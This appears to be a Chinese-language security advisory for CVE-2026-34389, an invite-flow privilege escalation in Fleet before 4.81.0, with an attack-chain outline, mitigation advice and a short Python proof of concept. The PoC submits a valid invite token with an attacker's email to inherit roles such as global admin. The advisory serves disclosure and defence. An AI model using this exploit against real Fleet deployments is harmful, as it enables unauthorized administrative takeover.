CVE-2026-34389 CVSS 6.5 中危

CVE-2026-34389 Fleet用户邀请流程权限提升漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34389

漏洞类型

权限提升

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Fleet

漏洞概述

Fleet开源设备管理软件在4.81.0之前的版本中存在严重的权限提升漏洞。由于用户邀请流程未校验接受邀请的邮箱，攻击者利用有效令牌可注册任意邮箱账户并继承邀请角色（如全局管理员），从而非法获取系统控制权。

技术细节

该漏洞源于Fleet用户邀请流程中的业务逻辑缺陷。当管理员发送邀请链接时，系统生成关联特定角色的令牌。在用户接受邀请的环节，服务端仅验证令牌的有效性，未严格比对请求中提交的邮箱地址与邀请原始目标邮箱的一致性。攻击者若能获取有效的邀请令牌，即可在接受流程中输入攻击者控制的任意邮箱地址。由于系统信任该令牌关联的角色权限（如Global Admin），新注册的账户将直接继承该高权限，从而绕过身份验证机制，非法获取系统最高管理权限。

攻击链分析

STEP 1

1. 获取令牌

攻击者通过钓鱼、日志泄露或推测等方式获取一个有效的用户邀请令牌。

STEP 2

2. 发起恶意请求

攻击者向Fleet的邀请接受接口发送请求，携带有效令牌，但将邮箱字段篡改为攻击者控制的邮箱。

STEP 3

3. 获取高权限

系统验证令牌通过后，创建绑定攻击者邮箱的账户，并赋予该令牌对应的角色（如全局管理员），攻击者成功接管系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # Exploit for CVE-2026-34389 # Description: Bypass email validation during invite acceptance to claim arbitrary roles. target_url = "https://fleet.example.com/api/v1/fleet/invites/accept" victim_invite_token = "VALID_INVITE_TOKEN_HERE" attacker_email = "[email protected]" payload = { "token": victim_invite_token, "email": attacker_email, "password": "NewPassword123!", "name": "Attacker Account" } response = requests.post(target_url, json=payload) if response.status_code == 200: print(f"[+] Success! Account created for {attacker_email} with inherited privileges.") else: print(f"[-] Failed. Status code: {response.status_code}") print(response.text)

影响范围

Fleet < 4.81.0

防御指南

临时缓解措施

建议立即审查系统中的用户邀请日志，排查是否存在异常账户创建行为。在升级修复前，建议暂时停止使用用户邀请功能，或仅通过极受信任的渠道发送邀请，并缩短令牌有效期。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表